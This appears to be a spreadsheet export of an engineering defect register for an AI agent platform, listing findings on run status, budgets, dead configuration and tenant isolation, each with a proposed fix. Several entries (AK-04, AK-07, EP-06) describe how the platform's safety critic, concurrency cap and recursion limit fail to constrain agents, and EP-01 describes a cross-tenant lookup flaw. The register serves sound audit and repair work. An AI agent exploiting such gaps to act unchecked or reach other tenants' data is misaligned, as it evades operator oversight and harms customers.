This is also what makes [AU-01](#au-01--any-admin-can-promote-themselves-to-app_admin)
possible: with no enum there is nothing to validate an incoming role string against.
- [`auth/models.py:35`](../../../backend/src/auth/models.py:35)
---</t>
  </si>
  <si>
    <t>AU-22</t>
  </si>
  <si>
    <t>Suspension is checked twice, in two different ways</t>
  </si>
  <si>
    <t>### AU-22 — Suspension is checked twice, in two different ways
**✅ Verified · Low**
`CompanySuspensionMiddleware` reads `company_id` from the **JWT claim** and runs its own
`SELECT` on its own session. `_authenticate_user` reads it from the **eager-loaded
`user.company`**.
If a user is moved between companies, the middleware checks the old company until the
token expires while the dependency checks the new one. The middleware also swallows
every exception and continues, so a database blip silently disables it.
The dependency-level check is correct and free. The middleware's own docstring says it
exists only because "the requirement specifically asked for Middleware".
- [`common/middleware.py`](../../../backend/src/common/middleware.py)
- [`auth/dependencies.py`](../../../backend/src/auth/dependencies.py)
**Fix:** delete the middleware. It costs a DB round trip per request and adds nothing
the dependency does not already do better.
---</t>
  </si>
  <si>
    <t>AK-01</t>
  </si>
  <si>
    <t>A run where every step failed can report COMPLETED</t>
  </si>
  <si>
    <t>05. The Agent Kernel</t>
  </si>
  <si>
    <t>### AK-01 — A run where every step failed can report `COMPLETED`
**✅ Verified · Critical**
`_final_status` decides the run's outcome like this:
```python
if state.all_subgoals_achieved() or (
    state.has_plan() and not state.plan_ready_steps()
):
    return RunStatus.COMPLETED.value
```
`plan_ready_steps()` returns the steps that are still *ready to run*. A step that ran and
failed is no longer ready. So a plan whose every step failed has no ready steps left, and
the run is stamped `COMPLETED`.
Step failures do land in `result_data["steps"]` and in the health records. They do **not**
reach the run status, which is the field the dashboards, the reports and the customer
see.
Consequence: runs that produced nothing are billed, reported as successes, and counted</t>
  </si>
  <si>
    <t>in the execution-health success rate.
- [`ai/core/agent_loop.py:1477`](../../../backend/src/ai/core/agent_loop.py:1477) — `_final_status`
- Also recorded as **D-34** in the platform register
**Fix:** require that the plan's required steps actually succeeded. `PARTIAL_COMPLETE`
already exists and is exactly the right status for this case.
---</t>
  </si>
  <si>
    <t>05-AGENT-KERNEL-DEFECTS.md</t>
  </si>
  <si>
    <t>2. T0 — The run reports the wrong thing</t>
  </si>
  <si>
    <t>AK-02</t>
  </si>
  <si>
    <t>The budget under-counts spend unless three separate syncs all fire</t>
  </si>
  <si>
    <t>### AK-02 — The budget under-counts spend unless three separate syncs all fire
**✅ Verified · High**
Most spend never flows back through `ActionResult.cost_usd`. The nested step path bills
by mutating `run.total_cost_usd` **on its own session**, and the critic pipeline writes
`usage_logs` rows without touching the run's cost column at all.
The loop compensates at the end of every iteration with three operations that must run in
this exact order:
```python
state.budget.consume(usd=action_result.cost_usd, wall_s=...)
await self._sync_budget_cost(state)          # pulls run.total_cost_usd UP via max()
if iter_critic_cost &gt; 0:
    state.budget.consume(usd=iter_critic_cost)
```
`_sync_budget_cost` uses `max()`, so adding critic cost *before* it silently discards the
critic spend. The ordering is load-bearing and nothing enforces it.
Any path that skips an iteration's bookkeeping — an exception, an early return —</t>
  </si>
  <si>
    <t>leaves the budget believing the run is cheaper than it is, and the cost cap does not
fire.
- [`ai/core/agent_loop.py:670`](../../../backend/src/ai/core/agent_loop.py:670)–688
- [`ai/core/agent_loop.py:838`](../../../backend/src/ai/core/agent_loop.py:838) — `_sync_budget_tokens`
**Fix:** one write path for cost. Every spender writes an attributed `usage_logs` row and
the budget reads the sum. Cause **C** above.
---</t>
  </si>
  <si>
    <t>AK-03</t>
  </si>
  <si>
    <t>A suspended run skips finalisation entirely</t>
  </si>
  <si>
    <t>### AK-03 — A suspended run skips finalisation entirely
**✅ Verified · High**
When a run suspends to wait on children, `_drive` returns **before** `_finalize_bandit`,
the dreaming trigger, `_persist_final` and billing settlement.
That is correct for a run that will be resumed. It is wrong for a run that never is —
and a run can fail to resume for several reasons: the child's `resume_parent_run`
enqueue fails, the worker dies, Redis loses the job.
The run then sits in `WAITING_ON_CHILDREN` forever: never settled, never billed, never
reported as failed, and invisible to any "failed runs" query.
- [`ai/core/agent_loop.py:227`](../../../backend/src/ai/core/agent_loop.py:227) — the early return
**Fix:** a sweeper that finds runs stuck in `WAITING_ON_CHILDREN` past their timeout and
finalises them as `FAILED`. `resume_parent_run` is already idempotent, so a late resume
after the sweep is harmless.
---</t>
  </si>
  <si>
    <t>AK-04</t>
  </si>
  <si>
    <t>The pre-critic almost never runs</t>
  </si>
  <si>
    <t>### AK-04 — The pre-critic almost never runs
**📄 Doc-reported · High**
The pre-critic is the gate that inspects a proposed action *before* it is executed. Any
move carrying a `plan_fragment` is given a synthetic `PASS` instead.
In practice every plan-driven iteration carries a plan fragment. So the pre-critic only
ever sees `Recursive` moves and no-fragment `SingleStep` moves — a small minority of
iterations.
The safety gate in front of every action is skipped on the path that covers nearly all
actions.
- [`ai/planning/critic_pipeline.py`](../../../backend/src/ai/planning/critic_pipeline.py)
- [`ai/core/agent_loop.py`](../../../backend/src/ai/core/agent_loop.py) — phase 3
---</t>
  </si>
  <si>
    <t>3. T1 — Built, wired, and inert</t>
  </si>
  <si>
    <t>AK-05</t>
  </si>
  <si>
    <t>Perception is written every iteration and read by nothing</t>
  </si>
  <si>
    <t>### AK-05 — `Perception` is written every iteration and read by nothing
**✅ Verified · Medium**
`state.perception = perception` is assigned at `agent_loop.py:422`. Grepping the whole
kernel for any other read returns only the module docstring telling new code to use it.
`Strategist.next_move` accepts a `perception` argument and ignores it.
`Perception.to_prompt_block()` has no production caller.
So the platform pays for building a perception object every iteration and then throws it
away.
- [`ai/core/agent_loop.py:422`](../../../backend/src/ai/core/agent_loop.py:422) — the only write
- [`ai/core/perceiver.py`](../../../backend/src/ai/core/perceiver.py)
- [`ai/core/strategist.py`](../../../backend/src/ai/core/strategist.py) — `next_move`
---</t>
  </si>
  <si>
    <t>AK-06</t>
  </si>
  <si>
    <t>The Perceiver's richest fields are always empty</t>
  </si>
  <si>
    <t>### AK-06 — The Perceiver's richest fields are always empty
**📄 Doc-reported · Medium**
The loop passes `memory_assembler=None`, and nothing ever sets `state.cortex_cursor`. So
on every real run:
| Field | Value in production |
|---|---|
| `viewport_text` | `""` |
| `intelligence_rules` | `[]` |
| `similar_past_runs` | `[]` |
Those three are the entire point of the Perceiver — they are what would let an agent
benefit from memory and from what previous runs learned. Together with
[AK-05](#ak-05--perception-is-written-every-iteration-and-read-by-nothing) it means the
memory system is wired to the loop and contributes nothing to it.
- [`ai/core/perceiver.py`](../../../backend/src/ai/core/perceiver.py)
---</t>
  </si>
  <si>
    <t>AK-07</t>
  </si>
  <si>
    <t>The child concurrency cap does not cap anything</t>
  </si>
  <si>
    <t>### AK-07 — The child concurrency cap does not cap anything
**✅ Verified · High**
`within_child_dispatch_cap` is computed, the result is logged, and then the executor
dispatches anyway. The code says so:
```python
if not within_child_dispatch_cap(state, governance):
    # The cap is now advisory: with the inline backpressure path retired,
    # we dispatch anyway and let the child queue absorb the fan-out.
    logger.info("Child dispatch cap reached for parent %s (%d in flight); dispatching anyway.", ...)
```
`max_concurrent_children` is configurable in the entity builder's Safeguards tab and
enforces nothing. The default is 8, and a `PROCESS` with 50 children will dispatch all 50
at once.
The queue that was supposed to absorb the fan-out —
`CHILD_RUN_QUEUE` — is also not routed. See
[SA-07](02-SYSTEM-ARCHITECTURE-DEFECTS.md#sa-07--the-child-run-queue-is-declared-and-not-used).
So both halves of the fan-out control are inactive.</t>
  </si>
  <si>
    <t>- [`ai/core/executors/child_entity.py`](../../../backend/src/ai/core/executors/child_entity.py) — `within_child_dispatch_cap` and the advisory branch
- Also recorded as **D-13** in the platform register
---</t>
  </si>
  <si>
    <t>AK-08</t>
  </si>
  <si>
    <t>state.blockers is written by a branch that cannot be reached</t>
  </si>
  <si>
    <t>### AK-08 — `state.blockers` is written by a branch that cannot be reached
**✅ Verified · Medium**
`blockers` is appended only by `apply_observation`, and only when
`observation.outcome == "blocked"`. `Observer._outcome` can only return `success`,
`partial` or `fail`.
So the list is always empty. The SupervisorCritic renders blockers into its prompt and
therefore always sees none — it is reasoning about a run with a permanently blank field
that was meant to tell it what is stuck.
- [`ai/core/agent_state.py:346`](../../../backend/src/ai/core/agent_state.py:346) — the append
- [`ai/core/observer.py`](../../../backend/src/ai/core/observer.py) — `_outcome`
- [`ai/planning/supervisor_critic.py:203`](../../../backend/src/ai/planning/supervisor_critic.py:203) — the consumer
---</t>
  </si>
  <si>
    <t>AK-09</t>
  </si>
  <si>
    <t>state.hypotheses is never written by anything</t>
  </si>
  <si>
    <t>### AK-09 — `state.hypotheses` is never written by anything
**✅ Verified · Low**
`hypotheses` is declared on `AgentState`, serialised into every snapshot, and
deserialised on restore. Nothing ever appends to it.
It costs a little snapshot size and a lot of reader confusion.
- [`ai/core/agent_state.py:190`](../../../backend/src/ai/core/agent_state.py:190)
---</t>
  </si>
  <si>
    <t>AK-10</t>
  </si>
  <si>
    <t>Five feature flags are declared and read nowhere</t>
  </si>
  <si>
    <t>### AK-10 — Five feature flags are declared and read nowhere
**✅ Verified · Medium**
| Flag | Default | Read by |
|---|---|---|
| `agent_loop.perception_bounded_viewport` | `True` | nothing |
| `agent_loop.snapshot_every_iteration` | `True` | nothing |
| `agent_loop.executor_dialog_enabled` | `False` | nothing |
| `agent_loop.executor_skill_enabled` | `False` | nothing |
| `agent_loop.executor_tool_burst_enabled` | `False` | nothing |
All five appear in the admin Feature Flags page. Toggling any of them does nothing at
all. An operator turning `snapshot_every_iteration` off to reduce write load will see no
change and no error.
- [`ai/core/feature_flags.py:41`](../../../backend/src/ai/core/feature_flags.py:41)–45
**Fix:** delete them, or wire them. Adding a flag is not the same as adding a control —
the same lesson as `tools.cost_resolver_v2_enabled` in the tool layer.
---</t>
  </si>
  <si>
    <t>AK-11</t>
  </si>
  <si>
    <t>Two SSE event names do not match, so the UI never sees them</t>
  </si>
  <si>
    <t>| **AK-11** | **Two SSE event names do not match, so the UI never sees them** | The map has `agent.loop.resume` and `agent.loop.replan`. The loop emits `agent.loop.resumed` (line 308) and `agent.replan.triggered` (line 1414). Neither `resume` nor `replan_triggered` frames ever reach the browser, so the live trace silently omits both events | ✅ Verified |</t>
  </si>
  <si>
    <t>4. T2 — Delete or fix the name</t>
  </si>
  <si>
    <t>AK-12</t>
  </si>
  <si>
    <t>Budget.can_afford is fully implemented with zero call sites</t>
  </si>
  <si>
    <t>| **AK-12** | `Budget.can_afford` is fully implemented with zero call sites | The `budget.py` module docstring claims "Strategist consults `pressure` and `can_afford`". It consults only `pressure` | ✅ Verified |</t>
  </si>
  <si>
    <t>AK-13</t>
  </si>
  <si>
    <t>The budget.py docstring says the critic self-skips on pressure</t>
  </si>
  <si>
    <t>| **AK-13** | The `budget.py` docstring says the critic self-skips on pressure | It does not. The critic degrades on a **cost-share** rule (`critic_cost / run_cost &gt; 0.20`), not on budget pressure. Anyone tuning cost from the docstring will tune the wrong knob | 📄 Doc-reported |</t>
  </si>
  <si>
    <t>AK-14</t>
  </si>
  <si>
    <t>core/README.md documents two files that do not exist</t>
  </si>
  <si>
    <t>| **AK-14** | `core/README.md` documents two files that do not exist | It lists `execution_engine.py` as "still reachable when `agent_loop.enabled=false`" and `recursive_engine.py` as a supporting service. Neither file exists; neither does the flag. `worker.py`'s docstring repeats the same stale reference | ✅ Verified |</t>
  </si>
  <si>
    <t>AK-15</t>
  </si>
  <si>
    <t>RunStatus.REPAIRING is unreachable</t>
  </si>
  <si>
    <t>| **AK-15** | `RunStatus.REPAIRING` is unreachable | No other status lists it as an allowed target, so nothing can enter it | 📄 Doc-reported |</t>
  </si>
  <si>
    <t>AK-16</t>
  </si>
  <si>
    <t>A pre-critic BLOCK still burns an iteration and a critic call</t>
  </si>
  <si>
    <t>### AK-16 — A pre-critic `BLOCK` still burns an iteration and a critic call
**📄 Doc-reported · Medium**
`budget.consume(iter_step=True)` runs **before** the pre-critic. So three consecutive
blocks — the circuit-breaker threshold — cost three iterations *and* three critic LLM
calls before the breaker trips and the run aborts.
The mechanism designed to stop waste is itself one of the more expensive paths in the
loop.
- [`ai/core/agent_loop.py`](../../../backend/src/ai/core/agent_loop.py) — phase 3
---</t>
  </si>
  <si>
    <t>5. T3 — Correctness and cost</t>
  </si>
  <si>
    <t>AK-17</t>
  </si>
  <si>
    <t>_handle_replan wipes completed step ids for dynamic plans</t>
  </si>
  <si>
    <t>### AK-17 — `_handle_replan` wipes completed step ids for dynamic plans
**📄 Doc-reported · Medium**
The wipe is guarded for static-plan entities. A **dynamic**-plan entity whose supervisor
keeps recommending `REPLAN` loses its record of completed steps each time, and re-runs
work it has already paid for.
That is a compounding cost: each replan makes the next iteration more expensive, which
makes budget pressure rise, which makes the supervisor more likely to intervene again.
- [`ai/core/agent_loop.py`](../../../backend/src/ai/core/agent_loop.py) — `_handle_replan`
---</t>
  </si>
  <si>
    <t>AK-18</t>
  </si>
  <si>
    <t>Two of three executors share the loop's database session</t>
  </si>
  <si>
    <t>### AK-18 — Two of three executors share the loop's database session
**📄 Doc-reported · Medium**
`SingleStepExecutor` opens its own `AsyncSessionLocal` specifically because using the
loop's shared session can corrupt it. `DAGExecutor` and `ChildEntityExecutor` still use
the passed-in `db`.
So the problem was diagnosed, the fix was written, and it was applied to one of the three
places that has it.
A corrupted session surfaces as a `PendingRollbackError` several operations later, in
code that did nothing wrong.
- [`ai/core/executors/`](../../../backend/src/ai/core/executors/)
---</t>
  </si>
  <si>
    <t>AK-19</t>
  </si>
  <si>
    <t>ChildEntity moves are never retried</t>
  </si>
  <si>
    <t>### AK-19 — `ChildEntity` moves are never retried
**📄 Doc-reported · Low**
Deliberate, and recorded here so it is not re-litigated: re-running a whole sub-agent on a
`REVISE` verdict is expensive and rarely changes the verdict.
The cost is that a child failing for a transient reason — a rate limit, a timeout — fails
the parent with no second attempt. A narrow retry on *transient* failure classes only
would be worth having.
---</t>
  </si>
  <si>
    <t>AK-20</t>
  </si>
  <si>
    <t>Child dispatch hard-fails without Redis</t>
  </si>
  <si>
    <t>### AK-20 — Child dispatch hard-fails without Redis
**✅ Verified · Medium**
`ChildEntityExecutor` returns an error when `redis is None`, because async dispatch is now
the sole child path — the inline fallback was deliberately retired to stop a
"~$11/child amplification".
That is the right trade. The consequence is that **any Redis blip fails every composite
entity**, and the error text ("child-entity dispatch requires Redis") reads like a
configuration problem rather than an outage.
- [`ai/core/executors/child_entity.py`](../../../backend/src/ai/core/executors/child_entity.py)
---</t>
  </si>
  <si>
    <t>AK-21</t>
  </si>
  <si>
    <t>The context bridge means two sources of truth for every value</t>
  </si>
  <si>
    <t>### AK-21 — The context bridge means two sources of truth for every value
**📄 Doc-reported · Medium**
`materialise_context_dict` copies state into a dict, the executors mutate the dict in
place, and `absorb_context_dict` copies it back. Budget pressure reaches the step prompt
by being written into `__agent_state__` and read back out by `step_executor`.
Every value that matters therefore exists in two forms, and they are reconciled once per
iteration. `INTERNAL_CONTEXT_KEYS` exists purely to stop loop plumbing leaking into an
LLM prompt through this path — which tells you how leaky it is.
The `agent_state.py` docstring is explicit that this is transitional. It is cause **A**
above.
- [`ai/core/agent_state.py`](../../../backend/src/ai/core/agent_state.py) — the two bridge methods
- [`ai/constants.py:31`](../../../backend/src/ai/constants.py:31) — `INTERNAL_CONTEXT_KEYS`
---</t>
  </si>
  <si>
    <t>EP-01</t>
  </si>
  <si>
    <t>Child resolution Strategy 4 crosses tenant boundaries</t>
  </si>
  <si>
    <t>06. Entities &amp; the Execution Pipeline</t>
  </si>
  <si>
    <t>### EP-01 — Child resolution Strategy 4 crosses tenant boundaries
**✅ Verified · Critical**
`resolve_child_entity_id` tries four strategies in order. The fourth is a name lookup:
```python
row = (await db.execute(
    select(HierarchicalEntity).where(
        HierarchicalEntity.name == name_hint,
        HierarchicalEntity.status != "DELETED",
    )
)).scalar_one_or_none()
```
There is **no `company_id` filter**. If tenant A's plan names a child that A does not
own, but tenant B has an entity with that exact name, this resolves to B's entity — and
the parent then executes it.
`scalar_one_or_none()` raises when two companies both have the name, so the failure is
loud in the common case and silent in the dangerous one: exactly one other tenant owns
that name.</t>
  </si>
  <si>
    <t>- [`ai/planning/child_resolver.py:114`](../../../backend/src/ai/planning/child_resolver.py:114) — Strategy 4
- Also recorded as **D-33** in the platform register
**Fix:** add `HierarchicalEntity.company_id == parent_entity.company_id`. One line.
---</t>
  </si>
  <si>
    <t>06-EXECUTION-PIPELINE-DEFECTS.md</t>
  </si>
  <si>
    <t>2. T0 — Tenant boundary and correctness</t>
  </si>
  <si>
    <t>EP-02</t>
  </si>
  <si>
    <t>ToolExecutor never passes company_id, so tenant tools are invisible</t>
  </si>
  <si>
    <t>### EP-02 — `ToolExecutor` never passes `company_id`, so tenant tools are invisible
**✅ Verified · High**
`get_tool_schemas` calls `ToolRegistry.get_all_schemas()` and
`execute_from_function_calls` calls `ToolRegistry.get_tool(name)` — both **without**
`company_id`, even though both registry methods accept one.
The `_tenant_tools` dict is therefore never consulted on any execution or advertisement
path. MCP adapters and synthesized DRAFT tools are neither offered to the model nor
resolvable if it names one.
- [`ai/tool_executor.py`](../../../backend/src/ai/tool_executor.py) — both call sites
- [`ai/tools/base.py:176`](../../../backend/src/ai/tools/base.py:176), [`:243`](../../../backend/src/ai/tools/base.py:243) — the methods that accept `company_id`
- Covered in depth as
  [TL-10](TOOL-LAYER-DEFECTS.md#tl-10--tenant-scoped-tools-are-unreachable-by-construction)
---</t>
  </si>
  <si>
    <t>EP-03</t>
  </si>
  <si>
    <t>parent_run_id means two different things</t>
  </si>
  <si>
    <t>### EP-03 — `parent_run_id` means two different things
**📄 Doc-reported · High**
The same column carries two unrelated relationships:
1. A **structural child run** — a `CHILD_ENTITY_INVOCATION` dispatched by a parent.
2. The **previous run in a retry or refine chain**.
Billing settlement skips any run with a `parent_run_id`
(`if run.parent_run_id: return Decimal("0")`). So a **retry** of a failed top-level run is
treated as a child and never settles — its cost accrues and is never charged.
Every report that walks the run tree also mixes the two relationships together.
- [`ai/orm/execution.py`](../../../backend/src/ai/orm/execution.py) — `parent_run_id`
- [`ai/governance/governance_service.py`](../../../backend/src/ai/governance/governance_service.py) — `settle_billing`
**Fix:** two columns. `parent_run_id` for structure, `retry_of_run_id` for chains.
---</t>
  </si>
  <si>
    <t>EP-04</t>
  </si>
  <si>
    <t>io_contract.input_schema is never validated</t>
  </si>
  <si>
    <t>### EP-04 — `io_contract.input_schema` is never validated
**✅ Verified · High**
The builder's Basics tab makes you define an input schema. The execution page reads it to
build the input form. Nothing ever validates `input_data` against it.
`_auto_generate_input_schema` populates the schema from the plan's prompt placeholders on
clone, which makes it look even more like a contract. It is a UI hint.
`output_schema` is weaker still — it is pasted into the prompt as an instruction and
nothing checks the result.
So an entity can be launched with completely wrong input, run its full plan, spend the
money, and fail at whatever step first tries to use the missing value.
- [`ai/service.py:1293`](../../../backend/src/ai/service.py:1293) — `_auto_generate_input_schema`
- No validator anywhere in the dispatch path
**Fix:** validate `input_data` against `input_schema` in `trigger_execution` and reject
with a 422 before the run row is created. This is the cheapest possible way to stop a
class of wasted runs.</t>
  </si>
  <si>
    <t>EP-05</t>
  </si>
  <si>
    <t>Eight settings in the builder have no runtime reader</t>
  </si>
  <si>
    <t>### EP-05 — Eight settings in the builder have no runtime reader
**✅ Verified · High**
| Setting | Where it is authored | Runtime readers |
|---|---|---|
| `logic_gate.retry_policy` | Brain tab | **none** — grep finds it only in the schema |
| `planning.loop_control` | Planning tab | **none** — only `schemas/planning.py:177` |
| `governance.max_recursion_depth` | Safeguards tab | prompt text only, see [EP-06](#ep-06--max_recursion_depth-is-a-sentence-in-a-prompt) |
| `governance.execution_limits.max_tool_calls` | Safeguards tab | prompt text only |
| `capabilities.tools[].rate_limit_per_run` | not authorable at all | branch exists, never fires |
| `ToolDefinition.max_execution_seconds` | not authorable at all | **none** |
| `io_contract.input_schema` | Basics tab | UI form only, see [EP-04](#ep-04--io_contractinput_schema-is-never-validated) |
| `io_contract.output_schema` | Basics tab | prompt text only |
The real retry bound is the hard-coded `MAX_RETRIES_PER_STEP = 2` plus the tool healing
ladder. The real ceiling on a runaway agent is `MAX_REACT_TURNS = 12`, the step
`timeout_ms`, and `governance.max_cost_usd`.
- [`ai/schemas/planning.py:177`](../../../backend/src/ai/schemas/planning.py:177)</t>
  </si>
  <si>
    <t>- [`ai/planning/retry_strategies.py`](../../../backend/src/ai/planning/retry_strategies.py) — `MAX_RETRIES_PER_STEP`
- [`ai/constants.py:63`](../../../backend/src/ai/constants.py:63) — `MAX_REACT_TURNS`
**Fix:** for each one, either wire it or remove the field from the builder. A greyed-out
"not yet implemented" control is honest; a working-looking one is not.
---</t>
  </si>
  <si>
    <t>3. T1 — Config that does nothing</t>
  </si>
  <si>
    <t>EP-06</t>
  </si>
  <si>
    <t>max_recursion_depth is a sentence in a prompt</t>
  </si>
  <si>
    <t>### EP-06 — `max_recursion_depth` is a sentence in a prompt
**✅ Verified · High**
The only use of the setting is:
```python
max_depth = governance.get("max_recursion_depth")
if max_depth:
    exec_constraints["Max recursion depth"] = str(max_depth)
```
It is rendered into the execution-constraints block of the prompt and the LLM is trusted
to respect it. Nothing counts actual depth and nothing refuses to go deeper.
In practice the only thing bounding a recursive fan-out is the credit balance and the
cost cap — both of which stop the run *after* the money is spent.
- [`ai/step_executor.py:681`](../../../backend/src/ai/step_executor.py:681)
---</t>
  </si>
  <si>
    <t>EP-07</t>
  </si>
  <si>
    <t>rate_limit_per_run cannot fire, in three separate ways</t>
  </si>
  <si>
    <t>### EP-07 — `rate_limit_per_run` cannot fire, in three separate ways
**✅ Verified · Medium**
The enforcement branch exists in `tool_executor.py` and reads
`call.get("rate_limit_per_run")`. It fails for three independent reasons:
1. The key must arrive **inside the function-call dict**. The only producer of those
   dicts is the LLM adapter, which emits `{"name", "args"}`. No call site injects it.
2. The field lives on `ToolDefinition`, but `Capabilities.tools` is typed
   `List[ToolReference]`, which has `tool_id` and nothing else. It cannot be authored.
3. The counter is wiped at the start of **every step**
   (`context['tool_call_counts'] = {}`), so even if 1 and 2 were fixed the limit would be
   per-step, not per-run.
- [`ai/tool_executor.py`](../../../backend/src/ai/tool_executor.py) — the read
- [`ai/step_executor.py:859`](../../../backend/src/ai/step_executor.py:859) — the per-step reset
- Covered in depth as
  [TL-11](TOOL-LAYER-DEFECTS.md#tl-11--the-only-enforced-rate-limit-is-never-populated)
---</t>
  </si>
  <si>
    <t>EP-08</t>
  </si>
  <si>
    <t>There is no per-tool timeout</t>
  </si>
  <si>
    <t>### EP-08 — There is no per-tool timeout
**📄 Doc-reported · Medium**
`ToolDefinition.max_execution_seconds` defaults to 30 and is unreachable config. What
actually bounds a tool call is the enclosing step's
`asyncio.wait_for(..., timeout_ms/1000)` and whatever internal timeout the tool happens to
implement.
A tool with no internal timeout, inside a step with a generous `timeout_ms`, can hold a
worker for a long time.
---</t>
  </si>
  <si>
    <t>EP-09</t>
  </si>
  <si>
    <t>entity.status is not a state machine</t>
  </si>
  <si>
    <t>### EP-09 — `entity.status` is not a state machine
**📄 Doc-reported · Medium**
There is no transition validation on entity status, and a `DRAFT` or `ARCHIVED` entity
executes perfectly happily. Only `DELETED` is enforced, in the arq ghost-run guard.
So "flip status to ACTIVE when ready" — the documented workflow — is advisory. A half-built
`DRAFT` agent referenced by a `PROCESS` will run.
- [`ai/orm/entity.py`](../../../backend/src/ai/orm/entity.py)
---</t>
  </si>
  <si>
    <t>EP-10</t>
  </si>
  <si>
    <t>version is decorative</t>
  </si>
  <si>
    <t>### EP-10 — `version` is decorative
**📄 Doc-reported · Medium**
`hierarchical_entities.version` is a semantic version string that nothing resolves,
compares, pins or increments.
The practical consequence: **editing an entity changes behaviour for runs already in
flight**. A run that started against version 1.0.0 will pick up whatever the row says on
its next step. There is no way to pin a run to the definition it started with.
---</t>
  </si>
  <si>
    <t>EP-11</t>
  </si>
  <si>
    <t>Several settings the runtime reads cannot be authored through the API</t>
  </si>
  <si>
    <t>### EP-11 — Several settings the runtime reads cannot be authored through the API
**📄 Doc-reported · Medium**
The entity create/update schema is a **closed** Pydantic model — unknown keys are dropped
without an error. Four keys the runtime *does* read are not declared fields, so they can
never be set through the API:
| Key | Read by |
|---|---|
| `governance.critic_cost_share_pct` | the critic pipeline's degrade rule |
| `governance.max_concurrent_children` | `within_child_dispatch_cap` |
| `logic_gate.review_mechanism.critic_model_override` | the kernel |
| `capabilities.tools[].usage` | `step_executor` |
They can only be set by editing the database directly. The seed authors documented this
as a trap.
**Fix:** declare them. Same change as
[PO-09](01-PRODUCT-OVERVIEW-DEFECTS.md#po-09--a-mistyped-config-key-in-the-entity-builder-disappears-silently)
— making the model reject unknown keys turns this whole class of problem into a 422.</t>
  </si>
  <si>
    <t>EP-12</t>
  </si>
  <si>
    <t>input_dependencies silently overrides context_policy</t>
  </si>
  <si>
    <t>### EP-12 — `input_dependencies` silently overrides `context_policy`
**📄 Doc-reported · Medium**
If a step declares `input_dependencies`, only `input` plus those dependencies reach it —
whatever the entity's `context_policy` says.
Two controls, one wins silently. A user who sets `context_policy: FULL` and also lists
dependencies on one step will find that step running with almost no context and no
explanation.
---</t>
  </si>
  <si>
    <t>EP-13</t>
  </si>
  <si>
    <t>ExecutionRun.idempotency_key and span_id</t>
  </si>
  <si>
    <t>| **EP-13** | `ExecutionRun.idempotency_key` and `span_id` | Dead columns. Both have partial indexes maintained for them | 📄 Doc-reported |</t>
  </si>
  <si>
    <t>4. T2 — Dead columns and dead docs</t>
  </si>
  <si>
    <t>EP-14</t>
  </si>
  <si>
    <t>ToolInteractionLog.idempotency_key</t>
  </si>
  <si>
    <t>| **EP-14** | `ToolInteractionLog.idempotency_key` | Same — dead column, indexed | 📄 Doc-reported |</t>
  </si>
  <si>
    <t>EP-15</t>
  </si>
  <si>
    <t>ExecutionRun.execution_time_ms</t>
  </si>
  <si>
    <t>| **EP-15** | `ExecutionRun.execution_time_ms` | Never written by the loop path. Derive from `completed_at - started_at`. Any dashboard reading it shows nulls | 📄 Doc-reported |</t>
  </si>
  <si>
    <t>EP-16</t>
  </si>
  <si>
    <t>__completed_steps__ in INTERNAL_KEYS.md</t>
  </si>
  <si>
    <t>| **EP-16** | `__completed_steps__` in `INTERNAL_KEYS.md` | Documented and never written. The live mechanism is `AgentState.completed_step_ids`. The doc is stale and misleads anyone debugging step completion | 📄 Doc-reported |</t>
  </si>
  <si>
    <t>EP-17</t>
  </si>
  <si>
    <t>The stale core/README.md</t>
  </si>
  <si>
    <t>| **EP-17** | The stale `core/README.md` | Documents `execution_engine.py` and `recursive_engine.py`, neither of which exists. Same entry as [AK-14](05-AGENT-KERNEL-DEFECTS.md#4-t2--delete-or-fix-the-name) | ✅ Verified |</t>
  </si>
  <si>
    <t>EP-18</t>
  </si>
  <si>
    <t>Every step output is stored twice</t>
  </si>
  <si>
    <t>### EP-18 — Every step output is stored twice
**✅ Verified · Medium**
`store_step_output` writes the value under the step **name** and again under the step
**id**:
```python
context_state[step_name] = value
if step_id and step_id != step_name:
    context_state[step_id] = value
```
Two consequences:
1. **Context size doubles.** Full outputs are deliberately preserved for data integrity,
   so for a research step producing 40 KB of findings, the context carries 80 KB.
2. **Duplicate step names silently overwrite each other.** Nothing validates that step
   names are unique within a plan.
The context is then trimmed by `_maybe_summarize_context` when it grows too large — so the
duplication directly causes earlier and more aggressive trimming of real data.</t>
  </si>
  <si>
    <t>- [`ai/core/context_utils.py:22`](../../../backend/src/ai/core/context_utils.py:22)
**Fix:** store once under the id, and resolve `{{name}}` references through a lookup.
---</t>
  </si>
  <si>
    <t>5. T3 — Traps in the step engine</t>
  </si>
  <si>
    <t>EP-19</t>
  </si>
  <si>
    <t>convert_to_template misses plan-only children</t>
  </si>
  <si>
    <t>### EP-19 — `convert_to_template` misses plan-only children
**📄 Doc-reported · Medium**
`clone_template` walks three discovery paths: the `parent_id` FK, `hierarchy.children`,
and `static_plan.steps[].target.entity_id`.
`convert_to_template` walks only the first two. An entity whose children are referenced
**only** from its static plan — which is how several seeds wire them — becomes a template
with missing children, and every clone of that template is broken.
- [`ai/service.py`](../../../backend/src/ai/service.py) — `convert_to_template` vs `clone_template`
---</t>
  </si>
  <si>
    <t>EP-20</t>
  </si>
  <si>
    <t>Parallel DAG steps run in isolated sessions</t>
  </si>
  <si>
    <t>### EP-20 — Parallel DAG steps run in isolated sessions
**📄 Doc-reported · Medium**
Each parallel branch gets its own session. That is correct and necessary — but it means
**never mutate a shared ORM object from a step**. Cost must be folded with the atomic
`_bump_run_cost` increment; a read-modify-write silently drops charges when two branches
finish together.
Nothing enforces this. It is a rule you have to know.
Related: two of the three executors still use the loop's shared session — see
[AK-18](05-AGENT-KERNEL-DEFECTS.md#ak-18--two-of-three-executors-share-the-loops-database-session).
---</t>
  </si>
  <si>
    <t>EP-21</t>
  </si>
  <si>
    <t>The Execution Detail page finds artifacts by regex</t>
  </si>
  <si>
    <t>### EP-21 — The Execution Detail page finds artifacts by regex
**📄 Doc-reported · Medium**
The UI locates a run's produced files by scanning the step output text for something that
looks like an artifact URL — not by querying `artifacts WHERE run_id = ...`.
So a tool that produces a real file but does not print its URL into its output produces an
**invisible artifact**: the row exists, the file exists, the user cannot see it.
`pdf_generator` makes this worse by leaving `run_id = NULL` on the artifact row and
writing the file twice.
- [`frontend/src/pages/ai/ExecutionDetail.tsx`](../../../frontend/src/pages/ai/ExecutionDetail.tsx)
- [`ai/tools/documents/pdf_generator.py`](../../../backend/src/ai/tools/documents/pdf_generator.py)
**Fix:** query by `run_id`. It is the column the table already has.
---</t>
  </si>
  <si>
    <t>EP-22</t>
  </si>
  <si>
    <t>With the resilience flag off, REACT tool calls get no healing at all</t>
  </si>
  <si>
    <t>### EP-22 — With the resilience flag off, REACT tool calls get no healing at all
